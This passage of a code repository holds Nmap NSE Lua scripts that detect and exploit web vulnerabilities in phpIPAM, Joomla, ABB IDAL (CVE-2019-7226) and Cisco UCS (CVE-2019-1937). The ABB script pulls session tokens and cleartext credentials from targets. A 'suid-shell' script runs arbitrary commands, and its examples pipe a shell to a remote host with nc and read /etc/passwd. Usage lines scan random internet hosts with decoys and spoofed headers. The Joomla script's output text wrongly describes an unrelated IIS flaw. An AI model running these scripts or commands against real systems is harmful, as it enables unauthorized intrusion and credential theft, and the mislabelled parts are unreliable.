application (IPAM). by default phpipam.nse 19 | searches for phpipam.html on target webserver, If target respondes 200 OK then my 20 | script will verify the version installed and If the 2 condictions are true it will 21 | display a vulnerable output. 22 | 23 | 24 | Some Syntax examples: 25 | nmap --script-help phpipam.nse 26 | nmap -sV -Pn -p 80 --open --script phpipam.nse 27 | nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24 28 | nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args uri=/phpipam.php 29 | nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 30 | nmap -sV -T4 -iR 400 -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam/ -oN IPAMreport.log 31 | 32 | ]] 33 | 34 | --- 35 | -- @usage 36 | -- nmap --script-help phpipam.nse 37 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse 38 | -- nmap -sV -Pn -p 80 --open --reason --script phpipam.nse 192.168.1.0/24 39 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args uri=/phpipam.php 40 | -- nmap -sV -Pn -p 80 --open --script phpipam.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 41 | -- nmap -sV -T4 -iR 400 -Pn -p 80 --open --reason --script phpipam.nse --script-args uri=/phpipam/ -oN IPAMreport.log 42 | -- @output 43 | -- PORT STATE SERVICE VERSION 44 | -- 80/tcp open http phpipam 1.2.1 45 | -- | phpipam: 46 | -- | STATUS: VULNERABLE 47 | -- | VERSION: 1.2.1 (likelly exploitable) 48 | -- | Disclosure date: 28 set 2016 49 | -- | Vuln discover: Saeed reza 50 | -- | Module Author: r00t-3xp10it 51 | -- | 52 | -- | Description: 53 | -- | phpipam is an open-source web IP address management application, its goal is to provide light 54 | -- | modern and useful IP address management. It is php-based application with MySQL database backend, 55 | -- | using jQuery libraries, ajax and some HTML5/CSS3 features. 56 | -- | [SQLI GET] => http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50' 57 | -- | [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1>&action=edit 58 | -- | 59 | -- | References: 60 | -- | Vendor: http://phpipam.net/ 61 | -- | Vuln Discover: http://0day.today/exploit/25375 62 | -- | Vuln Discover: https://www.exploit-db.com/exploits/39171/ 63 | -- | Module Author: https://sourceforge.net/u/peterubuntu10/profile/ 64 | -- |_ 65 | -- @args payload.uri the path name to search. Default: /phpipam.html 66 | -- @args payload.agent User-agent to send in request - Default: iPhone,safari 67 | --- 68 | 69 | author = "r00t-3xp10it" 70 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 71 | categories = {"safe", "discovery", "vuln"} 72 | 73 | 74 | 75 | -- DEPENDENCIES (lua nse libraries) -- 76 | local stdnse = require ('stdnse') --> required to use nse arguments 77 | local shortport = require "shortport" 78 | local string = require "string" 79 | local http = require "http" 80 | 81 | 82 | 83 | -- THE RULE SECTION -- 84 | -- portrule = shortport.http --> updated to scan only the selected ports/proto/services 85 | portrule = shortport.port_or_service({80, 443}, "http, https", "tcp", "open") 86 | -- local uri = "/phpipam.html" --> updated to use script @args payload.uri 87 | local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/phpipam.html" 88 | 89 | 90 | 91 | -- THE ACTION SECTION -- 92 | action = function(host, port) 93 | -- Manipulate TCP packet 'header' with false information about attacker :D 94 | local options = {header={}} --> manipulate 'header' request .. 95 | local useragent = options['header']['User-Agent'] 96 | -- read response from target (http.get) 97 | local response = http.get(host, port, uri, options) 98 | 99 | 100 | -- check if target its phpipam based website 101 | if ( response.status == 200 ) then 102 | local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>phpipam ([^<]*)") 103 | 104 | -- check firefox version installed (headers) 105 | if ( useragent == "Mozilla/5.0" ) then 106 | -- VULNERABLE nse module output display 107 | return "\n STATUS: VULNERABLE\n VERSION: "..title.." (likelly exploitable)\n Disclosure date: 28 set 2016\n Vuln discover: Saeed reza\n Module Author: r00t-3xp10it\n\n Description:\n phpipam is an open-source web IP address management application, its goal is to provide light\n modern and useful IP address management. It is php-based application with MySQL database backend,\n using jQuery libraries, ajax and some HTML5/CSS3 features.\n [SQLI GET] => http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50'\n [XSS POST] => http://[Site]/phpipam/app/admin/widgets/edit.php/wid=1>&action=edit\n\n References:\n Vendor: http://phpipam.net/\n Vuln Discover: http://0day.today/exploit/25375\n Vuln Discover: https://www.exploit-db.com/exploits/39171/\n Module Author: https://sourceforge.net/u/peterubuntu10/profile/\n\n" 108 | else 109 | -- NOT VULNERABLE version install found (1.2.1) of phpipam in target system 110 | return "\n STATUS: NOT VULNERABLE\n index: "..uri..": 200 Found\n VERSION: "..title.." (wrong version)\n Module Author: r00t-3xp10it\n\n" 111 | end 112 | 113 | -- check for diferent google return codes 114 | -- to display a NON VULNERABLE output... 115 | elseif ( response.status == 404 ) then 116 | return "\n index: "..uri.."\n STATUS: "..response.status.." NOT FOUND\n module author: r00t-3xp10it\n\n" 117 | elseif ( response.status == 400 ) then 118 | return "\n index: "..uri.."\n STATUS: "..response.status.." BAD REQUEST\n module author: r00t-3xp10it\n\n" 119 | elseif ( response.status == 401 ) then 120 | return "\n index: "..uri.."\n STATUS: "..response.status.." UNAUTHORIZED\n module author: r00t-3xp10it\n\n" 121 | elseif ( response.status == 302 ) then 122 | return "\n index: "..uri.."\n STATUS: "..response.status.." REDIRECTED\n module author: r00t-3xp10it\n\n" 123 | else 124 | -- I dont want to write more response.status ... so i let my module displays the returned code :D 125 | return "\n index: "..uri.."\n STATUS: "..response.status.." response code\n module author: r00t-3xp10it\n\n" 126 | end 127 | end 128 | -------------------------------------------------------------------------------- /Under Develop/joomla-3_4_5.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Port nmap nse script to: /usr/share/nmap/scripts 3 | -- Update database: sudo nmap --script-updatedb 4 | -- Usage: sudo nmap --script-help joomla-3_4_5.nse 5 | -- Usage: sudo nmap -sV -Pn -p 80 --script joomla-3_4_5.nse 6 | --- 7 | 8 | 9 | -- Dependencies (Lua libs) 10 | local http = require('http') 11 | local string = require('string') 12 | local shortport = require('shortport') 13 | local stdnse = require ('stdnse') 14 | local vulns = require ('vulns') 15 | 16 | 17 | description = [[ 18 | 19 | author: r00t-3xp10it 20 | Detects for joomla 3.4.5 vulnerable applications 21 | 22 | Some syntax examples: 23 | nmap -sV -Pn -p 80 --script vuln 24 | nmap -sV -Pn -p 80 --script joomla-3_4_5.nse 25 | nmap -sS -sV -T3 -iR 30 -Pn -p 80,443,631,5800 --open --reason --script joomla-3_4_5.nse -oN /root/nmap-report.log 26 | ]] 27 | 28 | --- 29 | -- @usage 30 | -- nmap --script-help ms15-034.nse 31 | -- nmap -sV -Pn -p 80 --script vuln 32 | -- nmap -sS -Pn -p 80 --script joomla-3_4_5.nse 33 | -- @output 34 | -- PORT STATE SERVICE 35 | -- 80/tcp open http 36 | -- |_joomla-3_4_5: 37 | -- | State: VULNERABLE 38 | -- | IDs: CVE-2015-1635 39 | -- | Response: 416 (exploitable) 40 | -- | Disclosure date: 2015-06-17 41 | -- | Author: r00t-3xp10it 42 | -- | 43 | -- | Description: 44 | -- | http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on 45 | -- | HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2, 46 | -- | Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. 47 | -- | Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit 48 | -- | Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd 49 | -- | 50 | -- | References: 51 | -- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635 52 | -- | https://technet.microsoft.com/en-us/library/security/ms15-034.aspx 53 | -- | http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd 54 | -- |_ 55 | -- @args joomla-3_4_5.uri URI to use in request. Default: / 56 | --- 57 | 58 | 59 | author = "r00t-3xp10it" 60 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 61 | categories = {"vuln"} 62 | -------------------------------------------------------------------------------- /Under Develop/suid-shell.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE suid-shell.nse - Version 1.4 3 | -- Copy nse to: /usr/share/nmap/scripts/suid-shell.nse 4 | -- Update db : sudo nmap --script-updatedb 5 | -- executing : nmap --script-help suid-shell.nse 6 | --- 7 | 8 | 9 | -- SCRIPT BANNER DESCRIPTION -- 10 | description = [[ 11 | 12 | Author: Maky, r00t-3xp10it 13 | NSE script to spawn a root shell on SUID OR simple execute an remote system command. 14 | This module accepts arguments like: User.command (system-command-to-execute-on-target) 15 | and: FakeUser.agent (The user-agent to send in header request -> Default: Macintosh,Firefox) 16 | 17 | Some Syntax examples: 18 | nmap --script-help suid-shell.nse 19 | nmap -sS -Pn -p 80 --script suid-shell.nse 20 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/bash" 21 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/sh -i" 22 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=cat /etc/passwd" 23 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/sh | nc 192.168.1.67 8080" 24 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 25 | nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=ls -a,agent=Mozilla/5.0 (compatible; EvilMonkey)" 26 | nmap -sV -Pn -T4 -iR 400 -p 80 --script suid-shell.nse --script-args "command=msfconsole -q -x 'use auxiliary/scanner/http/http_login; set RHOSTS 31.192.120.44; exploit'" 27 | 28 | ]] 29 | 30 | --- 31 | -- @usage 32 | -- nmap --script-help suid-shell.nse 33 | -- nmap -sS -Pn -p 80 --script suid-shell.nse 34 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/bash" 35 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/sh -i" 36 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=cat /etc/passwd" 37 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=/bin/sh | nc 192.168.1.67 8080" 38 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)" 39 | -- nmap -sS -Pn -p 80 --script suid-shell.nse --script-args "command=ls -a,agent=Mozilla/5.0 (compatible; EvilMonkey)" 40 | -- nmap -sS -Pn -iR 400 -p 80 --script suid-shell.nse --script-args "command=msfconsole -q -x 'use auxiliary/scanner/http/http_login; set RHOSTS 31.192.120.44; exploit'" 41 | -- @output 42 | -- PORT STATE SERVICE 43 | -- 80/tcp open http 44 | -- | suid-shell: 45 | -- | module author: r00t-3xp10it 46 | -- | user-agent : Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0 47 | -- |_ sys-command: /bin/sh | nc 192.168.1.67 8080 48 | -- 49 | -- @args User.command -> The command to be executed -> Default: /bin/bash 50 | -- @args FakeUser.agent -> The User-agent to send in header request -> Default: Macintosh,Firefox 51 | --- 52 | 53 | author = "Maky, r00t-3xp10it" 54 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 55 | categories = {"intrusive", "discovery", "safe"} 56 | 57 | 58 | 59 | -- DEPENDENCIES (lua nse libraries) -- 60 | local os = require "os" 61 | local http = require "http" 62 | local stdnse = require ('stdnse') 63 | local shortport = require "shortport" 64 | 65 | 66 | -- THE RULE SECTION -- 67 | portrule = shortport.http 68 | local command = stdnse.get_script_args(SCRIPT_NAME..".command") or "/bin/bash" 69 | local agent_string = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5" 70 | -- Manipulate header requests with false info about attacker 71 | local options = {header={}} 72 | options['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 GTB5" --> use Macintosh,firefox User-agent OR your own... 73 | options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 74 | options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it) 75 | 76 | 77 | -- THE ACTION SECTION -- 78 | action = function(host, port, options) 79 | -- local response = http.put(host, port, options, command) 80 | -- if response.status == 200 then 81 | -- return "\n module author: r00t-3xp10it\n user-agent : "..agent_string.."\n sys-command: "..command.."\n response : "..response.body.."\n" 82 | -- else 83 | -- return "\n module author: r00t-3xp10it\n user-agent : "..agent_string.."\n sys-command: "..command.."\n response : "..response.status.."\n" 84 | -- end 85 | -- execute system command (args) 86 | os.execute(""..command.."") 87 | return "\n module author: r00t-3xp10it\n user-agent : "..agent_string.."\n sys-command: "..command.."\n" 88 | end 89 | 90 | 91 | -------------------------------------------------------------------------------- /abb-cve-2019-7226.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE abb-cve-2019-7226.nse - Version 1.10 3 | -- Copy to: /usr/share/nmap/scripts/abb-cve-2019-7226.nse 4 | -- Update NSE database: sudo nmap --script-updatedb 5 | -- execute: nmap --script-help abb-cve-2019-7226.nse 6 | -- Port(s) accepted by this nse: 80-86,8080-8086 7 | --- 8 | 9 | -- SCRIPT BANNER DESCRIPTION -- 10 | description = [[ 11 | 12 | Module Author: r00t-3xp10it {Disclosure = Eldar Marcussen} 13 | NSE script to detect if target [ip]:[port][/url] its affected by CVE-2019-7226 (Improper Authentication) 14 | The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass authentication 15 | and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session in an authenticated state 16 | and returns the session ID along with what may be the username and cleartext password of the user. An attacker can then 17 | supply an IDALToken value in a cookie, which will allow them to perform privileged operations such as restarting the service 18 | with /cgi/restart. 19 | 20 | Some Syntax examples: 21 | nmap --script-help abb-cve-2019-7226.nse 22 | nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194 23 | nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194 24 | nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194 25 | nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77 26 | nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3 27 | 28 | ]] 29 | 30 | --- 31 | -- @usage 32 | -- nmap --script-help abb-cve-2019-7226.nse 33 | -- nmap -sV -T4 -Pn -n -p 80-86,8080 --open --script abb-cve-2019-7226.nse 137.44.25.194 34 | -- nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" 137.44.25.194 35 | -- nmap -sV -Pn -n -p 80 --open --script abb-cve-2019-7226.nse --script-args "uri=/vdeo/cgi/loginDefaultUser,verbose=true" 137.44.25.194 36 | -- nmap -sS -Pn -p 80,86 --open --script abb-cve-2019-7226.nse --script-args "User-Agent=Apache-HttpClient/4.0.3,verbose=true" 50.117.40.77 37 | -- nmap -sS -v -Pn -n -T4 -iR 700 -p 80-86,8080-8086 --open --script abb-cve-2019-7226.nse --script-args "verbose=true" -D 65.49.82.3 38 | -- @output 39 | -- PORT STATE SERVICE VERSION 40 | -- 80/tcp open http Apache httpd 2.4.38 41 | -- | abb-cve-2019-7226: 42 | -- | VULNERABLE: 43 | -- | ABB IDAL HTTP server CGI (Improper Authentication) 44 | -- | State: VULNERABLE 45 | -- | IDs: CVE:CVE-2019-7226 46 | -- | Risk factor: Higth CVSSv2: 8.8 HIGH (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) 47 | -- | The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass 48 | -- | authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session 49 | -- | in an authenticated state and returns the session ID along with what may be the username and cleartext password 50 | -- | of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged 51 | -- | operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in 52 | -- | '1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin' or a similar response. 53 | -- | 54 | -- | Disclosure date: 2019-Fev-04 55 | -- | Exploit results: 56 | -- | Uri: http://192.168.1.71:80/cgi/loginDefaultUser 57 | -- | Auth-Cookie: IDALToken=008b1047k72068r6100a69b0381d007p 58 | -- | Credentials: admin : MyS3cr3t 59 | -- | 60 | -- | Referencies: 61 | -- | https://nvd.nist.gov/vuln/detail/CVE-2019-7226 62 | -- | https://www.akaoma.com/ressources/cve/gain-privilege/cve-2019-7226 63 | -- | https://packetstormsecurity.com/files/153402/ABB-IDAL-HTTP-Server-Authentication-Bypass.html 64 | -- |_ 65 | -- @args verbose => Display More verbose outputs - Default: false 66 | -- @args User-Agent => User-Agent to send in requests - Default: iPhone,safari 67 | -- @args uri => the URL path to search in host.ip - Default: /cgi/loginDefaultUser 68 | --- 69 | 70 | 71 | author = "r00t-3xp10it" 72 | copyright = "Eldar Marcussen" 73 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 74 | categories = {"safe", "vuln"} 75 | 76 | 77 | -- DEPENDENCIES (lua nse libs) -- 78 | local http = require "http" 79 | local table = require "table" 80 | local vulns = require "vulns" 81 | local string = require "string" 82 | local stdnse = require "stdnse" --> nse args usage 83 | local shortport = require "shortport" 84 | 85 | 86 | -- THE RULE SECTION -- 87 | -- Scan only the selected ports/proto/service_names in 'open state' 88 | portrule = shortport.port_or_service({80, 81, 82, 83, 84, 85, 86, 8080, 8081, 8082, 8083, 8084, 8085, 8086}, "http, http-simple-new, http-proxy", "tcp", "open") 89 | 90 | 91 | -- THE ACTION SECTION -- 92 | action = function(host, port) 93 | local verbose = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false" 94 | local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/cgi/loginDefaultUser" 95 | 96 | 97 | -- Manipulate TCP packet 'header' with false information about attacker :D 98 | local _decoy = {header={}} --> manipulate 'header' request .. 99 | _decoy['header']['User-Agent'] = stdnse.get_script_args(SCRIPT_NAME..".User-Agent") or "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1" --> use iPhone,safari User-agent OR your own... 100 | _decoy['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language 101 | _decoy['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it) 102 | 103 | 104 | -- Identify servers that answer [200] to invalid HTTP requests 105 | -- and exit them (abort exec) as these would invalidate the tests. 106 | local status_404, result_404, _ = http.identify_404(host, port) 107 | if ( status_404 and result_404 == 200 ) then 108 | print("CVE-2019-7226:\n| Exiting: "..host.ip..":"..port.number..uri.." (false positive)\n| Reason: All URIs tested return status [200] OK\n|_") 109 | return nil 110 | end 111 | 112 | 113 | -- Make sure that uri respondes with 200 [OK] { no redirection | no_cache | no_cache_body } 114 | -- [001] importante check to be abble to classify host.ip as state.vulnerable 115 | local response = http.get(host, port, uri, _decoy, { redirect_ok = false, no_cache = true, no_cache_body = true }) 116 | if ( not(response or response.status) ) then 117 | uri_found = "false" 118 | elseif (response.status == 200 or response.status == 401 or response.status == 403 or response.status == 405 or response.status == 500) then 119 | uri_found = "true" 120 | else 121 | uri_found = "false" 122 | end 123 | 124 | 125 | -- Make sure auth cookie exists in response.body {table} 126 | -- Condition that show us that Server its leaking creds (auth cookie). 127 | -- [002] importante check to be abble to classify host.ip as state.vulnerable 128 | index = 1 129 | local tbl = {} 130 | local auth_stats = "false" 131 | local token, cookie_value, capt_creds 132 | if (response and response.body) then 133 | if (string.find(response.body, "IDALToken=")) then 134 | -- convert string (response.body) to table indexing[1] each token 135 | for token in string.gmatch(response.body, "[^%s]+") do 136 | tbl[index] = token 137 | index = index + 1 --> asign to each token an index number 138 | end 139 | auth_stats = "true" 140 | -- concaternate {table} index's values { tbl[3], tbl[4], tbl[5] } 141 | -- and store them inside local variables to be called further ahead. 142 | if ( #tbl == 5 and string.find(tbl[3], "IDALToken=") ) then 143 | cookie_value = tbl[3] 144 | capt_creds = tbl[4].." : "..tbl[5] 145 | elseif ( #tbl<5 and string.find(tbl[3], "IDALToken=") ) then 146 | cookie_value = tbl[3] 147 | capt_creds = "error retrieving table index's" 148 | elseif ( #tbl<3 or #tbl>5 ) then 149 | cookie_value = "error retriving table index's" 150 | capt_creds = "error retrieving table index's" 151 | end 152 | elseif (string.find(response.body, "#E_NEED_LOGIN")) then 153 | auth_stats = "Authentication required" 154 | elseif (response.status == 401 or response.status == 403) then 155 | auth_stats = "Unauthorized/Forbidden" 156 | else 157 | auth_stats = "false" 158 | end 159 | else 160 | auth_stats = "false" 161 | end 162 | 163 | 164 | -- Build Nmap vulnerable {table} 165 | local vuln_table = { 166 | title = "ABB IDAL HTTP server CGI (Improper Authentication)", 167 | state = vulns.STATE.NOT_VULN, 168 | IDS = {CVE = 'CVE-2019-7226'}, 169 | risk_factor = "High", 170 | scores = { 171 | CVSSv2 = "8.8 HIGH (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)", 172 | }, 173 | description = [[ 174 | The ABB IDAL HTTP server CGI interface contains a URL that allows an unauthenticated attacker to bypass 175 | authentication and gain access to privileged functions. Specifically, /cgi/loginDefaultUser creates a session 176 | in an authenticated state and returns the session ID along with what may be the username and cleartext password 177 | of the user. An attacker can then supply an IDALToken value in a cookie, which will allow them to perform privileged 178 | operations such as restarting the service with /cgi/restart. A GET request to /cgi/loginDefaultUser may result in 179 | '1 #S_OK IDALToken=532c8632b86694f0232a68a0897a145c admin admin' or a similar response. 180 | ]], 181 | references = { 182 | 'https://nvd.nist.gov/vuln/detail/CVE-2019-7226', 183 | 'https://packetstormsecurity.com/files/153402/ABB-IDAL-HTTP-Server-Authentication-Bypass.html', 184 | }, 185 | dates = { 186 | disclosure = {year = '2019', month = 'Fev', day = '04'}, 187 | }, 188 | exploit_results = {}, --> Display auth cookie and creds 189 | } 190 | 191 | 192 | -- Build vulnerable stdout (Display auth cookie and creds) 193 | if (uri_found == "true" and auth_stats == "true") then 194 | table.insert(vuln_table.exploit_results, string.format("Uri: http://"..host.ip..":"..port.number..uri)) 195 | table.insert(vuln_table.exploit_results, string.format("Auth-Cookie: "..cookie_value)) 196 | table.insert(vuln_table.exploit_results, string.format("Credentials: "..capt_creds.."\n")) 197 | end 198 | 199 | 200 | -- Final checks (uri_found|auth_stats) 201 | if (uri_found == "false" and verbose == "true") then 202 | return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: [404] Uri Not Found in Response\n\n" 203 | elseif (auth_stats == "false" and verbose == "true") then 204 | return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..response.status.."] Auth Cookie Not found\n\n" 205 | elseif (auth_stats == "Unauthorized/Forbidden" and verbose == "true") then 206 | return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..response.status.."] Unauthorized/Forbidden\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n"..response.body.."\n\n" 207 | elseif (auth_stats == "Authentication required" and verbose == "true") then 208 | return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..response.status.."] Authentication required\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n"..response.body.."\n\n" 209 | elseif ( not(response.body) ) then 210 | if (verbose == "true") then return "\n ABB IDAL HTTP server CGI (Improper Authentication)\n State: NOT VULNERABLE to CVE-2019-7226\n Reason: ["..response.status.."] None response.body returned\n Uri: http://"..host.ip..":"..port.number..uri.."\n\n" end 211 | -- We have reached The ['vulnerable_target'] == All [2] importante tests have succeded .. 212 | elseif (uri_found == "true" and auth_stats == "true") then 213 | vuln_table.state = vulns.STATE.VULN 214 | local report = vulns.Report:new(SCRIPT_NAME, host, port) 215 | return report:make_output(vuln_table) 216 | end 217 | end 218 | -------------------------------------------------------------------------------- /cisco-cve-2019-1937.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE cisco-cve-2019-1937.nse - Version 1.12 3 | -- Affected versions: Cisco UCS Director 6.6.0 <=> 6.7.0 4 | -- Copy to: /usr/share/nmap/scripts/cisco-cve-2019-1937.nse 5 | -- Update NSE database: sudo nmap --script-updatedb 6 | -- execute: nmap --script-help cisco-cve-2019-1937.nse 7 | -- Port(s) accepted by this nse: 80,443 8 | --- 9 | 10 | -- SCRIPT BANNER DESCRIPTION -- 11 | description = [[ 12 | 13 | Module Author: r00t-3xp10it {Disclosure = Pedro Ribeiro} 14 | A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, 15 | Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker 16 | to acquire a valid session token with administrator privileges, bypassing user authentication. The vulnerability 17 | is due to insufficient request header validation during the authentication process. An attacker could exploit this 18 | vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker 19 | to use the acquired session token to gain full administrator access to the affected device. 20 | 21 | Some Syntax examples: 22 | nmap --script-help cisco-cve-2019-1937.nse 23 | nmap -sV -T4 -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse 212.40.68.127 24 | nmap -sV -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "verbose=true" 212.40.68.127 25 | nmap -sV -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "lhost=192.168.1.71,verbose=true" 136.186.1.214 26 | nmap -sS -T4 -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "force_cookie=true,verbose=true" 136.186.1.214 27 | nmap -sS -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "User-Agent=Apache-HttpClient/4.0.3" 136.186.1.214 28 | nmap -sS -Pn -n -v -T4 -iR 750 -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "verbose=true" -D 172.217.168.174 29 | 30 | ]] 31 | 32 | --- 33 | -- @usage 34 | -- nmap --script-help cisco-cve-2019-1937.nse 35 | -- nmap -sV -T4 -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse 212.40.68.127 36 | -- nmap -sV -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "verbose=true" 212.40.68.127 37 | -- nmap -sV -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "lhost=192.168.1.71,verbose=true" 136.186.1.214 38 | -- nmap -sS -T4 -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "force_cookie=true,verbose=true" 136.186.1.214 39 | -- nmap -sS -Pn -n -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "User-Agent=Apache-HttpClient/4.0.3" 136.186.1.214 40 | -- nmap -sS -Pn -n -v -T4 -iR 750 -p 80,443 --open --script cisco-cve-2019-1937.nse --script-args "verbose=true" -D 172.217.168.174 41 | -- @output 42 | -- PORT STATE SERVICE 43 | -- 443/tcp open https 44 | -- | cisco-cve-2019-1937: 45 | -- | VULNERABLE: 46 | -- | Cisco UCS Supervisor (Web Interface Auth Bypass) 47 | -- | State: VULNERABLE 48 | -- | IDs: CVE:CVE-2019-1937 49 | -- | Risk factor: Critical CVSSv2: 10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C) 50 | -- | A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) Supervisor, 51 | -- | Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker 52 | -- | to acquire a valid session token with administrator privileges, bypassing user authentication. The vulnerability 53 | -- | is due to insufficient request header validation during the authentication process. An attacker could exploit this 54 | -- | vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker 55 | -- | to use the acquired session token to gain full administrator access to the affected device. 56 | -- | 57 | -- | Disclosure date: 2019-Ago-21 58 | -- | Exploit results: 59 | -- | Attack Vector: Remote 60 | -- | Uri: https://192.168.1.71:443/app/ui/ClientServlet?apiName=GetUserInfo 61 | -- | Auth-Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC74; 62 | -- | 63 | -- | Referencies: 64 | -- | https://nvd.nist.gov/vuln/detail/CVE-2019-1937 65 | -- | https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby 66 | -- | https://packetstormsecurity.com/files/154239/Cisco-UCS-IMC-Supervisor-Authentication-Bypass-Command-Injection.html 67 | -- |_ 68 | -- @args verbose => Display verbose Error(s) outputs - Default: false 69 | -- @args uri => the Full URL to send in GET requests - Default: /app/ui/ClientServlet?apiName=GetUserInfo 70 | -- @args User-Agent => User-Agent to send in requests - Default: Android; Mobile; Firefox 45.0 71 | -- @args force_cookie => bypass cookie name checks - Default: false 72 | -- @args lhost => Manually set 